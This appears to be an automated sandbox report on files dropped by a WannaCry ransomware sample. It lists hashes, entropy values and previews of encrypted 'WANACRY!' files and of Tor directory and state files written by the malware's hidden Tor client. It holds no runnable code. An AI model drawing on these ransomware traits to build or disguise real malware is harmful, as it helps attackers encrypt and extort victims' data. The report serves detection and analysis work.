                                                                              Preview:WANACRY!.....4..{y2&..O.HL._./D\z]{....F.E...m...'e...v..CX.....Z=.%.L..q............i....u......+......&.%.u........q'\.>@D....5.....|.N.(............Q.....x..,.......k.q.2"..~.L6......,........_.i.]..$.........SOB..D.....L.*...].GF .8..g..^T..:.................U.......I"u._m.)......../A@Zn..3.>/=...6..=>6P;0.N...1g..F..B.;~2..5...n.j._.k...&m.w.......n...n'....._.E.?(Cf^^.3o+......\....A..C.s...fw...6A.Yb.7l..c<......{...7A[a....{4|..uS........z.V...B...H3.Il.q...RK.<y..,..........nQ..OK4..S.>-....0..S.?..6.1...B.M/X.2Sy..8..Ekx...y[............&....e\.+J5....g.^.b%......6(...u.|...e.\M..V.A........R.....B;`."..NA.9I.......(p..c..25.4....Z.Y....I'%K7.'H..,.6..s.is.c..b......S..,....i.1.!..(.Q......g.Q.,.'..l...O...7^..So!.....oA.a......5.fa.:..c..W..A.n..<...../>t.la.._X..,.\............nO..l....j...s..D./....3.#ehJ..-...Dg`.U.."c-...S...B3..i.Nu..Z...B.1...'....K...u......L.Xs,..)..D7/../.s<.u76;......a.......[...ne.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):295192
                                                                              Entropy (8bit):7.999344313310653
                                                                              Encrypted:true
                                                                              SSDEEP:6144:zOjrl6hsUjSU2dr7lZbTA+1BThFRYR7u4V+qi1orRq35c5UYvG8C5VEm6u7OyM:zOjr2s7UunlZn/1BTHGA31Qq3KSsDCvC
                                                                              MD5:50EE742FB3C8438C6BC0A9DB6F134BD6
                                                                              SHA1:9D87BE1746226A68ABECAAF62934AE46461E1627
                                                                              SHA-256:A68731C45297658BE93957FED94A5C5FADB51992A2003E496A8B4F9C83628773
                                                                              SHA-512:3828E5EC968C6304FCDC60E6A4C77309E789008E70779230EF8EE06A9FCC5E1AE98B09F53E19BBCCB6E7E4E79E1C4E0A11BE36D408CAB994ED3B8405383A4286
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....4..{y2&..O.HL._./D\z]{....F.E...m...'e...v..CX.....Z=.%.L..q............i....u......+......&.%.u........q'\.>@D....5.....|.N.(............Q.....x..,.......k.q.2"..~.L6......,........_.i.]..$.........SOB..D.....L.*...].GF .8..g..^T..:.................U.......I"u._m.)......../A@Zn..3.>/=...6..=>6P;0.N...1g..F..B.;~2..5...n.j._.k...&m.w.......n...n'....._.E.?(Cf^^.3o+......\....A..C.s...fw...6A.Yb.7l..c<......{...7A[a....{4|..uS........z.V...B...H3.Il.q...RK.<y..,..........nQ..OK4..S.>-....0..S.?..6.1...B.M/X.2Sy..8..Ekx...y[............&....e\.+J5....g.^.b%......6(...u.|...e.\M..V.A........R.....B;`."..NA.9I.......(p..c..25.4....Z.Y....I'%K7.'H..,.6..s.is.c..b......S..,....i.1.!..(.Q......g.Q.,.'..l...O...7^..So!.....oA.a......5.fa.:..c..W..A.n..<...../>t.la.._X..,.\............nO..l....j...s..D./....3.#ehJ..-...Dg`.U.."c-...S...B3..i.Nu..Z...B.1...'....K...u......L.Xs,..)..D7/../.s<.u76;......a.......[...ne.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):808
                                                                              Entropy (8bit):7.742566227438362
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4hyfp2uywtCQjZxlVsJHxOnkWXUwsF4v5XI3sox6kndwwb:bk4hyjyS/ZxlVsJHxOkmUbS2nDb
                                                                              MD5:B06114E8AFFD46AF4942B61722D36AA5
                                                                              SHA1:E99D0CCB38E49D09A0D92268D00BFFEFD61A8639
                                                                              SHA-256:17532FA93DCDAE1FE10FCC6FD3DBB5E3E3B224039A5A5584D694F1E594289822
                                                                              SHA-512:92A92EB2BB3AEC3121E38C3C87F5491759715AA0BB49F9815497932B7C303C48104FBDC3C8DAECAB00B323A50291BD048D32D8C88D2C94F4C662703306518F75
                                                                              Malicious:false
                                                                              Preview:WANACRY!........!..;....l|...`....C..-..?.....=.....S`m..4Jt. ..ue.a:...cE2Tn7....D.l........1!."P.&...7..?n.O`.....!..q....A.y...gM#..!.u...p.w.U...1......].H..{/....C.s"..He.>}q.*...s.Q...?.V.7.nh.B....i.s.s..K.C..6..@D4P.%....PO3!./.]...%r.V._.5..5.................-..R..@.b......0.....f;y<..|...\......RRLX.6C57.{*z.........^..|O.....%b....&^3...L.IU.Y..._..!("..l.8.:b.A....@.O.i..N....e....S.=.X\)..k...r.C\..1(....2...A...>X4.zM.N.[.@@5...a..xp9..mI.y..B-....T..8G-T.......g..v..}Xa...".KxX.Mr.V......{vq.*|C@.,.z...E|.(.....Saw......"^z....$.IELh..#^h!...|...ocp.Jb...;z..g0.`>9.O.Z.....G@../U.mI8...`..N..=.....n.......E...i.._ ..X.3sJ"$+.&q..j...._. ..P|.]a..1.5.?.D.0H..w....F.^..c|..Gx.p...d.K]28...@O|..7B!..E.<..$../.%2..?.g.|...&.....J1.E.A.|.[...7..:..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):808
                                                                              Entropy (8bit):7.742566227438362
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4hyfp2uywtCQjZxlVsJHxOnkWXUwsF4v5XI3sox6kndwwb:bk4hyjyS/ZxlVsJHxOkmUbS2nDb
                                                                              MD5:B06114E8AFFD46AF4942B61722D36AA5
                                                                              SHA1:E99D0CCB38E49D09A0D92268D00BFFEFD61A8639
                                                                              SHA-256:17532FA93DCDAE1FE10FCC6FD3DBB5E3E3B224039A5A5584D694F1E594289822
                                                                              SHA-512:92A92EB2BB3AEC3121E38C3C87F5491759715AA0BB49F9815497932B7C303C48104FBDC3C8DAECAB00B323A50291BD048D32D8C88D2C94F4C662703306518F75
                                                                              Malicious:false
                                                                              Preview:WANACRY!........!..;....l|...`....C..-..?.....=.....S`m..4Jt. ..ue.a:...cE2Tn7....D.l........1!."P.&...7..?n.O`.....!..q....A.y...gM#..!.u...p.w.U...1......].H..{/....C.s"..He.>}q.*...s.Q...?.V.7.nh.B....i.s.s..K.C..6..@D4P.%....PO3!./.]...%r.V._.5..5.................-..R..@.b......0.....f;y<..|...\......RRLX.6C57.{*z.........^..|O.....%b....&^3...L.IU.Y..._..!("..l.8.:b.A....@.O.i..N....e....S.=.X\)..k...r.C\..1(....2...A...>X4.zM.N.[.@@5...a..xp9..mI.y..B-....T..8G-T.......g..v..}Xa...".KxX.Mr.V......{vq.*|C@.,.z...E|.(.....Saw......"^z....$.IELh..#^h!...|...ocp.Jb...;z..g0.`>9.O.Z.....G@../U.mI8...`..N..=.....n.......E...i.._ ..X.3sJ"$+.&q..j...._. ..P|.]a..1.5.?.D.0H..w....F.^..c|..Gx.p...d.K]28...@O|..7B!..E.<..$../.%2..?.g.|...&.....J1.E.A.|.[...7..:..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9608
                                                                              Entropy (8bit):7.981125498664282
                                                                              Encrypted:false
                                                                              SSDEEP:192:WP+rVD3bKWn0R9JsdVmxnn8g0chW668OIBcXJoVKZ6439T9Cc4IaRXMunfEGnXY:xh3bKSGmdVmF8gtH6LIf6JFlapMWRXY
                                                                              MD5:FEAC0F3DEB0C9A9E155BFE8C278E685D
                                                                              SHA1:8D239CB7A764EF7FD0FD9A2FCCE82F824693B705
                                                                              SHA-256:006D00F037F977E1C20A48B3A6513C08ACFEA49A7570B0F7B11FECBC0D9F6330
                                                                              SHA-512:1B7B60BFE07FEF01AB5E187BF21028B160E4F1AE34BCA23A5733276BD9CB794C1B337C264BFD68AD3DDEE70E2BB585EB23A10EA1D0C9613156ED2547287D2AF6
                                                                              Malicious:false
                                                                              Preview:WANACRY!......".('a.'..{..'.......P.......zQm..<.I.U...q..zSQ$....+..Y..G...2......k.9..).gx[E.....K.G.....q..{V..rX...'.4.....e...`.;...s$..#..J.U.\:..l.E,._.(N.....O .N...;..HM.t..S3_...aS...~i...XBv..).J....f...2.s...xk.J.....O.!k.....X...`.L..a....gX.V.....f$......4..C.ai....h...X.....9.J.U...%..zTUI8.*}pYBw..(..;.`O.S..n.KT..+1..4..C.S.>....<HD..9y......%j?l.a..ux...{[....#g..0u.....[cH..Y.,.l..5..S...X%K.LV.5..F.0...$.w&&d_..F.(.......dR..7l...kUN...9..RX.E...8..=E.AX.n.e.f.....pTy..GmP...i|..l....r.....#.*Y.*..F....B.,_..@..Hg.0..({r.....P..:a....v..ULq..Z..S..+.$@.P....K..X...l..K...d.......};...-E..c....{c.9y:0L.#.."R...r.f......;.....]...M...j.yQ..s...)...:i<.}.L..&<o...n...a|..r.m!J.-B..cX.O.r.Y"g.a...k0.....d.s..M....B=L.9.x..W.....Yf...U.1.......++3..!m:..b.%.ts.-.P/I.bL..3{.I..gb .ji...B...cZ..,...#+.....$.......B@...../.nAH[.5...n.....Rn2....N.C.`...c..u;@*.A.6.K&\...h.1......\..}...0.......[.~...G..\.W.*vM.../m..lLG.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9608
                                                                              Entropy (8bit):7.981125498664282
                                                                              Encrypted:false
                                                                              SSDEEP:192:WP+rVD3bKWn0R9JsdVmxnn8g0chW668OIBcXJoVKZ6439T9Cc4IaRXMunfEGnXY:xh3bKSGmdVmF8gtH6LIf6JFlapMWRXY
                                                                              MD5:FEAC0F3DEB0C9A9E155BFE8C278E685D
                                                                              SHA1:8D239CB7A764EF7FD0FD9A2FCCE82F824693B705
                                                                              SHA-256:006D00F037F977E1C20A48B3A6513C08ACFEA49A7570B0F7B11FECBC0D9F6330
                                                                              SHA-512:1B7B60BFE07FEF01AB5E187BF21028B160E4F1AE34BCA23A5733276BD9CB794C1B337C264BFD68AD3DDEE70E2BB585EB23A10EA1D0C9613156ED2547287D2AF6
                                                                              Malicious:false
                                                                              Preview:WANACRY!......".('a.'..{..'.......P.......zQm..<.I.U...q..zSQ$....+..Y..G...2......k.9..).gx[E.....K.G.....q..{V..rX...'.4.....e...`.;...s$..#..J.U.\:..l.E,._.(N.....O .N...;..HM.t..S3_...aS...~i...XBv..).J....f...2.s...xk.J.....O.!k.....X...`.L..a....gX.V.....f$......4..C.ai....h...X.....9.J.U...%..zTUI8.*}pYBw..(..;.`O.S..n.KT..+1..4..C.S.>....<HD..9y......%j?l.a..ux...{[....#g..0u.....[cH..Y.,.l..5..S...X%K.LV.5..F.0...$.w&&d_..F.(.......dR..7l...kUN...9..RX.E...8..=E.AX.n.e.f.....pTy..GmP...i|..l....r.....#.*Y.*..F....B.,_..@..Hg.0..({r.....P..:a....v..ULq..Z..S..+.$@.P....K..X...l..K...d.......};...-E..c....{c.9y:0L.#.."R...r.f......;.....]...M...j.yQ..s...)...:i<.}.L..&<o...n...a|..r.m!J.-B..cX.O.r.Y"g.a...k0.....d.s..M....B=L.9.x..W.....Yf...U.1.......++3..!m:..b.%.ts.-.P/I.bL..3{.I..gb .ji...B...cZ..,...#+.....$.......B@...../.nAH[.5...n.....Rn2....N.C.`...c..u;@*.A.6.K&\...h.1......\..}...0.......[.~...G..\.W.*vM.../m..lLG.
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18574
                                                                              Entropy (8bit):6.0531614785526795
                                                                              Encrypted:false
                                                                              SSDEEP:384:eea4igBVA1hrqeU49VU1hjYWd24VdzVH591hFsNlb50IU4mV91h59MY4JVtG1hIR:7a9gBSyD4uXYG26ZJQlb+3jntBELGf/Q
                                                                              MD5:83A131D54E907F3A5B7C4C2F15E4E44C
                                                                              SHA1:70D602F40372C4291F06FC77F9447FDB6147E1C8
                                                                              SHA-256:1ABE560348847B587D6B7ADE0E6533F1A75AC01B6B321B4352B0E754B4B1A2FF
                                                                              SHA-512:E5923EA28FF38FC3E1D29E62101015BA742E8FED34DD56F410A74CB1C38A040ADA6D9329F23BDB57E72BEAAE315B995BC0F5FD287D0132B3BE6BD18EF96F8CEC
                                                                              Malicious:false
                                                                              Preview:dir-key-certificate-version 3..fingerprint D586D18309DED4CD6D57C18FDB97EFA96D330566..dir-key-published 2022-11-10 23:21:36..dir-key-expires 2023-11-10 23:21:36..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAvi5+A+XPw4jxMYhmEI4+MpnaX3dUEbsMGHA+xAMnmVhuxbm3Dn5c..TyhQNY2LOlsieE84UYG+J4dABfaFH4w0l6zUJkuytX4+6WRQontw9puR/IcXkRwM..8Tv/tY675OYRCm9DgDAWfqZM0IgTzSrYRDl8eFPSFCOP0NhMrQZeUrdKgwAXVZWP..xt9nTCwT4K9BMp47LEmZKdEokeVsr0l29Z9v5+r24k9x8EQjDexsoHwlVrxWfarG..1klWssfSFpkMN+FkTQnBC6ByiBh5ZKM5AC/HkVFvuHjehUpfrtNk6XNFcKbDvEIg..qPdg1QWuuSWpZVA+/EwSBtwMNcq9pv60L8Cm9WCJoSC691WByiGwFCy1/XcBI4J/..BkoMEvP3kAxzm92jqGbpFSJawFRPZKy89FDKpha/So3CERQPV0ar+DTpVqDlryWV..N4x1IzpPeSHFj7T74q8qdrxx0wcAjWJ9WYoGQif6FK3hHcmbSGSgyvAFeoYxyUCL..JHkjBCD4WTWVAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA2Vt7oP9P+yEV+zzaH40/j5PTsRb1Pyyzd6P3PLKObM6Wil/ZvcBF..XB7KDIO/bsL6/K1ZqQwn4zVaLQndNWNN2eXGWZ6F2l3h2nK4MbIMTYs1iiDgtDbe..zYYlGGJXbmD/iju0NaXwtnqstwZl
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):18574
                                                                              Entropy (8bit):6.0531614785526795
                                                                              Encrypted:false
                                                                              SSDEEP:384:eea4igBVA1hrqeU49VU1hjYWd24VdzVH591hFsNlb50IU4mV91h59MY4JVtG1hIR:7a9gBSyD4uXYG26ZJQlb+3jntBELGf/Q
                                                                              MD5:83A131D54E907F3A5B7C4C2F15E4E44C
                                                                              SHA1:70D602F40372C4291F06FC77F9447FDB6147E1C8
                                                                              SHA-256:1ABE560348847B587D6B7ADE0E6533F1A75AC01B6B321B4352B0E754B4B1A2FF
                                                                              SHA-512:E5923EA28FF38FC3E1D29E62101015BA742E8FED34DD56F410A74CB1C38A040ADA6D9329F23BDB57E72BEAAE315B995BC0F5FD287D0132B3BE6BD18EF96F8CEC
                                                                              Malicious:false
                                                                              Preview:dir-key-certificate-version 3..fingerprint D586D18309DED4CD6D57C18FDB97EFA96D330566..dir-key-published 2022-11-10 23:21:36..dir-key-expires 2023-11-10 23:21:36..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAvi5+A+XPw4jxMYhmEI4+MpnaX3dUEbsMGHA+xAMnmVhuxbm3Dn5c..TyhQNY2LOlsieE84UYG+J4dABfaFH4w0l6zUJkuytX4+6WRQontw9puR/IcXkRwM..8Tv/tY675OYRCm9DgDAWfqZM0IgTzSrYRDl8eFPSFCOP0NhMrQZeUrdKgwAXVZWP..xt9nTCwT4K9BMp47LEmZKdEokeVsr0l29Z9v5+r24k9x8EQjDexsoHwlVrxWfarG..1klWssfSFpkMN+FkTQnBC6ByiBh5ZKM5AC/HkVFvuHjehUpfrtNk6XNFcKbDvEIg..qPdg1QWuuSWpZVA+/EwSBtwMNcq9pv60L8Cm9WCJoSC691WByiGwFCy1/XcBI4J/..BkoMEvP3kAxzm92jqGbpFSJawFRPZKy89FDKpha/So3CERQPV0ar+DTpVqDlryWV..N4x1IzpPeSHFj7T74q8qdrxx0wcAjWJ9WYoGQif6FK3hHcmbSGSgyvAFeoYxyUCL..JHkjBCD4WTWVAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEA2Vt7oP9P+yEV+zzaH40/j5PTsRb1Pyyzd6P3PLKObM6Wil/ZvcBF..XB7KDIO/bsL6/K1ZqQwn4zVaLQndNWNN2eXGWZ6F2l3h2nK4MbIMTYs1iiDgtDbe..zYYlGGJXbmD/iju0NaXwtnqstwZl
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2985080
                                                                              Entropy (8bit):5.637216273452224
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Hq5j8hwj/QkhKGbOdEGdxKuVeMEB0XHMkraFIqAKr2Mkblb8gFSfL2dlQ3JZVHE4:Kl820G5DTpYdSjI+3VE4
                                                                              MD5:BF69ABB5ED0955F25E027653245D2EA7
                                                                              SHA1:E00F3CB4B2B439F774AFA00984C5FD599178DD3A
                                                                              SHA-256:8144E44513D666647B2B4CEE806937D2F2BA3462C21B90D4B44F3C27FA8068BF
                                                                              SHA-512:1B3728076EF0A2097135D7FF7471F14137D5DC688B3AFFA618B1FB43934E2CFDA357D4CDA421FF718B41E77646C7533893505E78754C446C051AB1180DAEFD24
                                                                              Malicious:false
                                                                              Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-10-04 06:00:00..fresh-until 2024-10-04 07:00:00..valid-until 2024-10-04 09:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2985080
                                                                              Entropy (8bit):5.637216273452224
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Hq5j8hwj/QkhKGbOdEGdxKuVeMEB0XHMkraFIqAKr2Mkblb8gFSfL2dlQ3JZVHE4:Kl820G5DTpYdSjI+3VE4
                                                                              MD5:BF69ABB5ED0955F25E027653245D2EA7
                                                                              SHA1:E00F3CB4B2B439F774AFA00984C5FD599178DD3A
                                                                              SHA-256:8144E44513D666647B2B4CEE806937D2F2BA3462C21B90D4B44F3C27FA8068BF
                                                                              SHA-512:1B3728076EF0A2097135D7FF7471F14137D5DC688B3AFFA618B1FB43934E2CFDA357D4CDA421FF718B41E77646C7533893505E78754C446C051AB1180DAEFD24
                                                                              Malicious:false
                                                                              Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-10-04 06:00:00..fresh-until 2024-10-04 07:00:00..valid-until 2024-10-04 09:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with very long lines (16050)
                                                                              Category:dropped
                                                                              Size (bytes):253942
                                                                              Entropy (8bit):4.704443767815471
                                                                              Encrypted:false
                                                                              SSDEEP:3072:lT+8Wp5tuu8vxyTGTqAtuuY9TFoWpZtuuxTnKTfMWpKA:TEu5buVDo2ueYMu
                                                                              MD5:9B0247D7A4ED5736CB5BF28D63259BEA
                                                                              SHA1:D6E4901ED9F0932401C408666D0166C7ADA35F8F
                                                                              SHA-256:D106B74EF85B6C5AE4F00FFFC3C5EC33B119B752213FFEFF9EE5C96543973BAB
                                                                              SHA-512:D740132A3D805FF92973CA8AF21BEDFE232DB42912DB5FF96911F6973D46E51CA1CBDF198FFF1749BA0F8EB88F186E00D5C05AD1E9D422DF52896D925CD03608
                                                                              Malicious:false
                                                                              Preview:@last-listed 2024-10-04 06:44:35.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBANW3jM6C/cRm/krdTkGeRlXh25LDXTn2CGyrlz+KFcFxQ4qDnj9j4FYs.NLVc1+iC7sLdVfuFxpEQaJtUTIr9z/Sdm05IzyTW+F4tsRypoyhut4NyILRfPokB.15uTlrfPN9yltEdGFYaEQci0Ru1epiY6rWYAaydYits2WTviuZiRAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key U9regYb4cz0lTAhghEE+GgLZ/EqWanfXzNpAdH+r1ns.family $02FCF62C0AD3AD1D208D7F27E12E8840EF53C7E0 $03465D21A22B24B242301471D5AA11E4E0E0C915 $035F813195F0CB9F567EDFDF60C6745CA36BA0BD $0632EC43FEA8EA3F377FE2E34DA671746F1642DD $0705F969B825FAE29BCEB3F692B0A4224DED82E0 $07DCECDF04BE5D470C615C8E1CCF086F74FC8CA6 $0863252662246FFF6914F380711C75DC4027BD75 $09768BD9ACA211008713BA481E0B8EE3239A9F0B $098F98538A21A16332E8C4B724305C2A3496A467 $09CA1957EC0671044DAD2EEA282A348FFD7D271E $0A3AAF530747D7034DBF88C518033A22827E3C46 $0A76C0A0A721DDBC324B705ADBFC95FD806AE855 $0AF982CC71A01D95E8959D763D0EC0E5A6C61244 $0B5BC76B3BE7553B229FD3E73F26AED41C31DD19 $0B8EF5F5016926F4245350FB37914E30BF36C528 $0CD666F9C
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):222
                                                                              Entropy (8bit):4.869598081724102
                                                                              Encrypted:false
                                                                              SSDEEP:6:SbdWwxXXMP19znXr87+QVe2vwR/EtbWWURbibfl8BMLipn:bwxXAXr87HVBvwN2Pu
                                                                              MD5:214E43720F83C1F3654D05DFFE54E714
                                                                              SHA1:0CA08D7C009DB46FBE438099063EA66270725C0B
                                                                              SHA-256:81CBA3222D6D90751425576DDBB2DDE86211A7369AF9E9D49CA40747D12CA099
                                                                              SHA-512:A567530A0EF87DA3F390899F5CBDE2BF828241F3EA6EADAC4F6A619927490C7827484DF78A5872CB6B9767CDA77672631D343B6B92EBEB64BA9B67E216337634
                                                                              Malicious:false
                                                                              Preview:# Tor state file last generated on 2024-10-04 02:43:36 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-10-04 06:43:36..
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):222
                                                                              Entropy (8bit):4.869598081724102
                                                                              Encrypted:false
                                                                              SSDEEP:6:SbdWwxXXMP19znXr87+QVe2vwR/EtbWWURbibfl8BMLipn:bwxXAXr87HVBvwN2Pu
                                                                              MD5:214E43720F83C1F3654D05DFFE54E714
                                                                              SHA1:0CA08D7C009DB46FBE438099063EA66270725C0B
                                                                              SHA-256:81CBA3222D6D90751425576DDBB2DDE86211A7369AF9E9D49CA40747D12CA099
                                                                              SHA-512:A567530A0EF87DA3F390899F5CBDE2BF828241F3EA6EADAC4F6A619927490C7827484DF78A5872CB6B9767CDA77672631D343B6B92EBEB64BA9B67E216337634
                                                                              Malicious:false
                                                                              Preview:# Tor state file last generated on 2024-10-04 02:43:36 local time..# Other times below are in UTC..# You *do not* need to edit this file.....TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2024-10-04 06:43:36..
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2985080
                                                                              Entropy (8bit):5.637216273452224
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Hq5j8hwj/QkhKGbOdEGdxKuVeMEB0XHMkraFIqAKr2Mkblb8gFSfL2dlQ3JZVHE4:Kl820G5DTpYdSjI+3VE4
                                                                              MD5:BF69ABB5ED0955F25E027653245D2EA7
                                                                              SHA1:E00F3CB4B2B439F774AFA00984C5FD599178DD3A
                                                                              SHA-256:8144E44513D666647B2B4CEE806937D2F2BA3462C21B90D4B44F3C27FA8068BF
                                                                              SHA-512:1B3728076EF0A2097135D7FF7471F14137D5DC688B3AFFA618B1FB43934E2CFDA357D4CDA421FF718B41E77646C7533893505E78754C446C051AB1180DAEFD24
                                                                              Malicious:false
                                                                              Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 33..valid-after 2024-10-04 06:00:00..fresh-until 2024-10-04 07:00:00..valid-until 2024-10-04 09:00:00..voting-delay 300 300..client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2
                                                                              Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              File Type:ASCII text, with very long lines (1006), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2985080
                                                                              Entropy (8bit):5.637216273452224
                                                                              Encrypted:false
                                                                              SSDEEP:12288:Hq5j8hwj/QkhKGbOdEGdxKuVeMEB0XHMkraFIqAKr2Mkblb8gFSfL2dlQ3JZVHE4:Kl820G5DTpYdSjI+3VE4
                                                                              MD5:BF69ABB5ED0955F25E027653245D2EA7
                                                                              SHA1:E00F3CB4B2B439F774AFA00984C5FD599178DD3A
                                                                              SHA-256:8144E44513D666647B2B4CEE806937D2F2BA3462C21B90D4B44F3C27FA8068BF
                                                                              SHA-512:1B3728076EF0A2097135D7FF7471F14137D5DC688B3AFFA618B1FB43934E2CFDA357D4CDA421FF718B41E77646C7533893505E78754C446C051AB1180DAEFD24
                                                                              Malicious:false
